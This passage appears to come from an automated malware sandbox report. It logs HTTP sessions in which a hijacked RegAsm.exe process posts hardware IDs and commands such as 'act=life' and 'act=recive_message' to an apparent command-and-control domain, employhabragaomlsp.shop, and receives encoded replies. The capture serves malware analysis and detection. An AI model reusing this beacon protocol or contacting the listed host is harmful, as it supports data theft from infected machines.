                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IfPQEO3si0%2B7tEZq6jukgxw4TRWeXRPB2A7T2%2FXLxAJEmQZOH36y2slE4MgXR7T3OnS9pzjlv6njKLnEENu2Pi%2BAOFrAdMI4l5J1fFbeno9d8nhU5TX9p0IiHGR6kgEHOvGEVrwLfgl8%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888717a4d478cb1-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.649734188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:12 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 5429
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:12 UTC5429OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:14 UTC816INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:14 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=v42r77nmdjo9ce0bbhuns34de7; expires=Mon, 16-Sep-2024 16:08:52 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOUmwm3Bk1%2B6brUvtsFdD7FghWTQy3JLCYaJRqvE%2B%2Bj1GKPLdhIln%2B6kQpMFtkOLeX0wEhO4BwIcpPpIiuP8L5IwjQ8xAFU8XMJ7hoJ8Yy3D6GANpIupGggJLP8gw2xMDEZs5p3PUp%2FDYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871814cba7277-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.649736188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:14 UTC270OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-05-23 22:22:14 UTC806INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:14 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=96dmsr7ae0nqpkashekh37m2l4; expires=Mon, 16-Sep-2024 16:08:53 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5IBcGHLZRI2hskIkv47YpBbcCWZFmfFYnkOyeWmY7pdRiEvT0MqkWFMBDgOWdYLPOoEGSnCDlWGuOb8cYP5jqATPxfsowgczTWZRBVhUktCcA5MnRIW2umgvobvS96XQhLdULYR8Recng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888718b4b18c34a-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                Data Ascii: 2ok
                                2024-05-23 22:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.649737188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:14 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 1237
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:14 UTC1237OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:15 UTC812INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:15 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=9qu6m8464r2fju6q06k4ml3irf; expires=Mon, 16-Sep-2024 16:08:54 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jofq6rgQTeLo3NYreuKVegkHz6OSqgrYqXBoZD0yL3efy9Bxnx4C56IqlejBRqmG5jt1%2BZR2suVHpJyW7ykhi36uyhBQIIdFr9zmDzLHofcSQVO%2FwnNny6pkpRSS3grECFN1f122%2FqCEDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887190199d8c7b-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.649738188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:15 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 5429
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:15 UTC5429OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:15 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:15 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=8bnl4dgr9gl2lu92avklp8pql8; expires=Mon, 16-Sep-2024 16:08:54 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBdJ9MbSlBpK1EwquvBnig8omJ2CpkXXSLMSc70q7JMHSo8%2FCrjMVNikmJrTOcfEH71cka%2FW5OF8wxE9U0aLhh8Z3FSGVNc3jL%2FteYUgnvBuhIg9Xamnnbccr%2FJZBEM4pxEYq3EjGURUug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871915f7b8c7e-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.649739188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:15 UTC271OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 49
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:15 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                2024-05-23 22:22:16 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:16 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=kqf04st0n9i4td900a40smt85f; expires=Mon, 16-Sep-2024 16:08:54 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLzsMNlgb%2F3nfMqoT%2FTpCY3DhMbnbvN8lIeX41OiVQstmpUN7yooTklgrNkNSeJKlI2aOdvRVNKzU8AYTchE07rPgut0tVx9HZJjCl7jmQKDaSB0VAib1hXqV%2BYqLU95Wq%2BI7PhSJKMPMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887192eea3184d-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:16 UTC555INData Raw: 34 66 63 0d 0a 43 7a 6b 43 67 39 6e 38 6a 61 6f 4b 5a 75 2f 35 34 2b 6d 68 47 45 36 77 42 53 37 71 44 78 62 48 48 4f 52 4b 4e 66 42 46 6f 30 5a 77 4d 77 75 68 72 39 36 33 69 6a 35 4b 35 66 44 42 6d 73 51 36 64 4a 42 78 58 4a 39 71 4f 73 30 56 78 69 74 52 30 6e 2b 44 49 47 70 56 63 65 62 31 39 6f 53 49 5a 78 37 4e 77 38 4f 79 71 78 45 31 75 67 77 6e 79 47 70 34 35 53 62 45 61 45 4b 56 4a 38 59 2b 66 31 78 73 38 4c 43 54 34 2b 70 6e 41 35 75 59 6a 6f 6a 53 63 32 44 5a 61 67 7a 47 42 52 2f 4f 50 6f 45 77 46 38 70 6c 67 51 74 75 54 57 50 4f 75 49 2f 6d 69 43 5a 73 35 76 44 42 6a 4e 55 36 64 4a 41 6e 63 73 68 2f 64 37 56 39 69 54 6c 70 30 6e 2f 59 47 69 6c 51 64 75 61 72 6e 66 6e 44 5a 51 69 63 70 63 48 54 6c 79 68 2b 67 44 55 65 6c 79 30 63 7a 6d 48 75 51 32
                                Data Ascii: 4fcCzkCg9n8jaoKZu/54+mhGE6wBS7qDxbHHORKNfBFo0ZwMwuhr963ij5K5fDBmsQ6dJBxXJ9qOs0VxitR0n+DIGpVceb19oSIZx7Nw8OyqxE1ugwnyGp45SbEaEKVJ8Y+f1xs8LCT4+pnA5uYjojSc2DZagzGBR/OPoEwF8plgQtuTWPOuI/miCZs5vDBjNU6dJAncsh/d7V9iTlp0n/YGilQduarnfnDZQicpcHTlyh+gDUely0czmHuQ2
                                2024-05-23 22:22:16 UTC728INData Raw: 6c 4d 67 53 4e 6c 47 7a 69 6a 2b 35 6a 68 79 57 55 45 6e 35 4f 4b 67 4d 5a 6f 4a 39 74 71 51 59 68 67 66 71 70 39 68 69 39 64 6d 43 6a 4c 49 47 52 57 5a 75 47 37 33 71 47 67 41 32 2f 4e 6e 4a 6e 4c 6d 7a 68 73 38 57 4a 63 6a 32 46 69 35 30 54 47 51 44 79 4e 61 61 70 6d 4b 7a 4d 4c 2b 4e 50 31 68 49 68 76 43 4d 33 44 77 38 76 4c 66 79 2f 52 62 45 4f 4c 5a 58 2b 33 66 70 51 75 57 70 63 31 78 79 46 6e 55 57 50 7a 73 5a 44 70 79 32 45 50 68 4a 36 47 6a 34 4d 30 52 4c 6b 4d 44 49 39 31 4e 50 30 38 78 67 6c 61 6d 53 76 4c 4d 32 6b 62 43 49 71 6b 30 49 65 6a 63 57 7a 6d 38 4d 47 4d 7a 7a 70 30 6b 43 64 49 69 57 6c 31 6f 58 43 49 4c 46 75 55 4b 63 77 72 62 31 46 67 35 72 47 57 35 38 6c 6c 44 34 4b 62 68 49 62 48 66 43 44 54 59 67 7a 47 42 52 2f 4f 50 6f 45 77 46
                                Data Ascii: lMgSNlGzij+5jhyWUEn5OKgMZoJ9tqQYhgfqp9hi9dmCjLIGRWZuG73qGgA2/NnJnLmzhs8WJcj2Fi50TGQDyNaapmKzML+NP1hIhvCM3Dw8vLfy/RbEOLZX+3fpQuWpc1xyFnUWPzsZDpy2EPhJ6Gj4M0RLkMDI91NP08xglamSvLM2kbCIqk0IejcWzm8MGMzzp0kCdIiWl1oXCILFuUKcwrb1Fg5rGW58llD4KbhIbHfCDTYgzGBR/OPoEwF
                                2024-05-23 22:22:16 UTC1369INData Raw: 33 38 62 38 0d 0a 49 4e 45 6f 5a 45 31 6e 6f 64 50 31 38 49 59 41 62 35 54 7a 36 75 43 44 66 53 43 53 50 77 37 49 61 33 69 67 63 59 67 6f 57 5a 4d 71 78 79 42 6b 57 33 4c 6e 71 5a 6e 75 79 32 73 43 69 4a 2b 42 69 73 5a 2f 4b 4e 70 6a 51 49 63 74 4f 73 30 56 37 57 68 51 69 6d 65 5a 5a 69 6c 30 64 2b 2b 74 6c 66 76 50 65 42 57 33 32 62 53 49 7a 58 51 72 78 43 63 6b 34 33 49 36 7a 52 57 66 51 44 7a 35 5a 38 59 6f 4b 51 4d 69 6f 62 4b 4d 2f 63 78 75 44 34 61 4a 6b 34 48 48 65 79 33 56 61 45 32 44 61 48 69 76 64 59 49 36 58 35 73 6b 30 79 42 70 55 47 72 6e 2b 39 43 48 6f 77 4e 45 69 6f 50 42 30 34 45 36 43 4e 39 33 51 49 4e 37 63 37 56 4c 68 53 5a 5a 6c 54 47 42 54 41 4a 45 4c 6f 6e 51 68 34 65 6a 41 30 53 4b 6c 38 48 54 67 54 6f 6a 33 57 68 45 69 47 78 77 71
                                Data Ascii: 38b8INEoZE1nodP18IYAb5Tz6uCDfSCSPw7Ia3igcYgoWZMqxyBkW3LnqZnuy2sCiJ+BisZ/KNpjQIctOs0V7WhQimeZZil0d++tlfvPeBW32bSIzXQrxCck43I6zRWfQDz5Z8YoKQMiobKM/cxuD4aJk4HHey3VaE2DaHivdYI6X5sk0yBpUGrn+9CHowNEioPB04E6CN93QIN7c7VLhSZZlTGBTAJELonQh4ejA0SKl8HTgToj3WhEiGxwq
                                2024-05-23 22:22:16 UTC1369INData Raw: 38 2b 57 66 47 50 43 6b 44 49 71 47 4c 6b 2b 50 44 5a 45 61 34 6d 49 2b 46 78 47 78 73 75 67 78 54 78 67 55 66 76 42 62 74 51 78 65 56 4b 34 46 38 4b 78 74 76 34 4c 61 55 35 4d 5a 6b 42 59 32 66 67 6f 48 44 64 53 6e 55 62 30 57 49 66 33 4f 71 66 34 63 6a 58 4a 38 70 78 43 56 73 58 43 43 76 30 2f 57 45 69 47 38 63 7a 63 50 44 79 2b 35 54 46 70 49 50 4a 35 63 6a 48 4d 35 6e 37 6b 4d 38 30 69 44 4e 5a 44 45 5a 49 4f 57 78 6e 75 4c 43 59 77 75 4f 6e 49 2b 4c 7a 6e 41 2b 32 6d 64 4d 68 6d 74 31 71 58 75 48 4a 46 53 41 4b 38 63 70 62 31 4e 79 6f 66 58 32 68 4b 4d 6f 41 35 58 62 32 63 6d 44 57 69 66 65 5a 45 43 4a 61 6a 61 45 64 49 55 6a 57 39 41 53 77 69 70 6e 58 48 61 68 30 2f 58 77 68 67 42 76 6c 50 50 71 34 49 4e 39 49 4a 49 2f 44 73 68 70 63 4b 6c 2b 67 53
                                Data Ascii: 8+WfGPCkDIqGLk+PDZEa4mI+FxGxsugxTxgUfvBbtQxeVK4F8Kxtv4LaU5MZkBY2fgoHDdSnUb0WIf3Oqf4cjXJ8pxCVsXCCv0/WEiG8czcPDy+5TFpIPJ5cjHM5n7kM80iDNZDEZIOWxnuLCYwuOnI+LznA+2mdMhmt1qXuHJFSAK8cpb1NyofX2hKMoA5Xb2cmDWifeZECJajaEdIUjW9ASwipnXHah0/XwhgBvlPPq4IN9IJI/DshpcKl+gS
                                2024-05-23 22:22:16 UTC1369INData Raw: 79 43 39 6c 55 47 54 74 73 70 76 70 79 57 30 42 6a 4a 2b 4e 67 63 56 35 4c 39 31 6f 51 34 41 74 4f 73 30 56 37 57 68 51 69 6d 65 5a 5a 69 6c 2b 64 2b 71 31 6d 4b 2b 67 41 78 76 44 38 2b 71 53 71 78 46 48 6b 6d 42 41 79 44 55 32 35 58 4b 50 4c 6c 47 58 4b 38 41 69 59 56 35 6f 35 62 71 59 36 63 74 6e 41 49 69 61 6a 6f 2f 50 64 43 62 54 5a 6b 43 44 59 6e 2b 67 50 73 68 41 50 50 6c 6e 78 6a 77 70 41 79 4b 68 69 70 33 35 33 33 67 49 7a 66 50 71 6c 49 30 53 52 38 73 50 4a 2b 4d 74 63 36 6b 2b 33 6d 6f 58 6b 7a 58 4c 4c 6d 64 65 62 2b 53 34 6b 65 6a 46 62 67 69 48 6b 6f 6d 4e 7a 48 4d 2b 30 57 74 43 6a 32 4e 34 71 33 4f 4d 4b 31 72 53 61 61 6c 50 41 68 74 6e 2b 66 76 47 72 59 68 45 41 34 43 31 69 6f 66 45 4f 6b 53 35 65 41 4c 67 42 6d 33 4e 46 65 31 6f 55 4a 35
                                Data Ascii: yC9lUGTtspvpyW0BjJ+NgcV5L91oQ4AtOs0V7WhQimeZZil+d+q1mK+gAxvD8+qSqxFHkmBAyDU25XKPLlGXK8AiYV5o5bqY6ctnAIiajo/PdCbTZkCDYn+gPshAPPlnxjwpAyKhip3533gIzfPqlI0SR8sPJ+Mtc6k+3moXkzXLLmdeb+S4kejFbgiHkomNzHM+0WtCj2N4q3OMK1rSaalPAhtn+fvGrYhEA4C1iofEOkS5eALgBm3NFe1oUJ5
                                2024-05-23 22:22:16 UTC1369INData Raw: 56 39 72 36 62 65 62 35 38 31 70 44 49 65 54 6a 6f 54 52 65 79 50 62 59 45 65 46 59 6e 71 67 63 4a 51 76 58 4a 6b 76 79 43 70 76 47 79 36 4a 30 50 57 76 7a 33 42 45 31 64 6e 42 76 63 42 30 4a 38 4e 6f 54 34 51 74 48 4d 35 68 79 45 41 38 69 30 2b 71 54 79 6c 63 62 4b 48 6a 33 4b 2f 45 5a 67 53 43 6c 34 32 41 79 33 73 67 33 47 42 4a 67 57 56 38 74 33 2b 43 49 46 61 63 4b 4d 41 67 62 46 35 6b 35 72 2b 59 34 49 67 6d 62 4f 62 77 77 59 7a 62 4f 6e 53 51 4a 32 4f 50 65 46 57 66 50 75 35 44 53 4e 78 50 71 6a 30 42 4d 41 75 68 76 4a 4b 76 6b 43 70 45 68 35 43 46 69 4d 64 2f 49 39 4e 6d 53 70 70 71 66 62 64 77 69 79 64 66 6d 69 37 41 49 47 78 57 5a 75 32 78 6e 2b 6a 47 5a 67 7a 4e 31 65 6e 67 71 44 6f 72 79 69 63 55 79 69 31 56 74 57 57 55 50 6c 71 7a 4b 73 35 6b
                                Data Ascii: V9r6beb581pDIeTjoTReyPbYEeFYnqgcJQvXJkvyCpvGy6J0PWvz3BE1dnBvcB0J8NoT4QtHM5hyEA8i0+qTylcbKHj3K/EZgSCl42Ay3sg3GBJgWV8t3+CIFacKMAgbF5k5r+Y4IgmbObwwYzbOnSQJ2OPeFWfPu5DSNxPqj0BMAuhvJKvkCpEh5CFiMd/I9NmSppqfbdwiydfmi7AIGxWZu2xn+jGZgzN1engqDoryicUyi1VtWWUPlqzKs5k
                                2024-05-23 22:22:16 UTC1369INData Raw: 48 6a 33 4b 2f 44 59 41 75 66 6e 6f 69 44 78 33 4d 73 31 6d 31 42 6a 32 31 78 71 48 75 43 4a 6c 4f 56 4a 38 30 72 62 6c 4e 76 35 62 75 52 72 34 59 41 62 2b 62 62 68 70 4f 44 49 6d 36 53 52 30 65 65 54 48 71 75 62 4d 5a 41 50 49 31 70 71 55 39 77 4d 77 75 4b 2b 35 6e 6a 69 44 42 47 7a 5a 57 49 69 73 74 30 49 4e 70 6a 58 6f 68 6d 66 61 70 2f 69 53 68 55 6b 79 33 4a 4e 6d 39 62 61 2b 6d 38 6c 75 76 47 65 67 57 43 32 38 2f 6a 71 42 46 73 31 58 38 4d 30 43 38 30 6c 47 69 42 4c 31 6a 51 44 73 59 2f 61 46 46 6a 36 72 66 65 68 36 4e 33 53 75 58 77 6d 4f 4f 6f 45 57 7a 56 61 77 7a 51 4c 7a 53 6f 63 6f 73 73 52 5a 34 6e 77 53 31 75 55 58 4c 75 74 4a 50 73 79 47 30 57 6a 49 6d 4f 67 4d 5a 35 4b 4e 31 6f 51 49 42 6e 4e 4f 73 57 37 55 4d 58 6c 54 2b 42 66 43 73 62 54
                                Data Ascii: Hj3K/DYAufnoiDx3Ms1m1Bj21xqHuCJlOVJ80rblNv5buRr4YAb+bbhpODIm6SR0eeTHqubMZAPI1pqU9wMwuK+5njiDBGzZWIist0INpjXohmfap/iShUky3JNm9ba+m8luvGegWC28/jqBFs1X8M0C80lGiBL1jQDsY/aFFj6rfeh6N3SuXwmOOoEWzVawzQLzSocossRZ4nwS1uUXLutJPsyG0WjImOgMZ5KN1oQIBnNOsW7UMXlT+BfCsbT
                                2024-05-23 22:22:16 UTC1369INData Raw: 76 69 43 5a 73 35 76 44 42 6a 4e 73 36 64 4a 41 6e 62 35 39 37 66 72 34 2b 37 6b 4e 49 33 45 2b 71 50 51 45 77 43 36 47 38 6b 71 2b 51 4b 6b 53 41 6e 49 2b 44 78 58 51 71 77 47 74 44 6a 6d 31 31 72 33 4f 4b 49 31 43 63 4c 4d 63 68 5a 46 74 6d 35 37 2b 61 36 38 5a 72 52 4d 50 7a 36 75 43 44 66 54 53 53 50 77 37 49 53 6c 6d 55 50 4b 55 2f 51 5a 67 67 7a 54 4a 69 57 6d 50 33 74 6f 36 76 6f 41 4d 62 77 2f 50 71 6b 71 73 52 52 35 4a 67 51 4d 67 31 4e 75 56 31 69 43 31 57 6e 69 33 47 4b 6e 74 61 61 75 32 36 6d 65 6a 44 65 67 2b 66 6b 49 6d 49 7a 58 49 6c 30 6d 6c 4d 69 57 42 30 35 54 44 75 51 7a 7a 53 49 4e 6c 6b 4d 52 6b 67 78 4a 69 4a 2b 63 49 71 4a 35 71 4e 69 34 7a 50 62 43 66 54 5a 46 71 46 66 54 54 4e 46 5a 6c 6d 50 2f 6b 2b 71 55 38 43 47 32 66 74 2b 38
                                Data Ascii: viCZs5vDBjNs6dJAnb597fr4+7kNI3E+qPQEwC6G8kq+QKkSAnI+DxXQqwGtDjm11r3OKI1CcLMchZFtm57+a68ZrRMPz6uCDfTSSPw7ISlmUPKU/QZggzTJiWmP3to6voAMbw/PqkqsRR5JgQMg1NuV1iC1Wni3GKntaau26mejDeg+fkImIzXIl0mlMiWB05TDuQzzSINlkMRkgxJiJ+cIqJ5qNi4zPbCfTZFqFfTTNFZlmP/k+qU8CG2ft+8
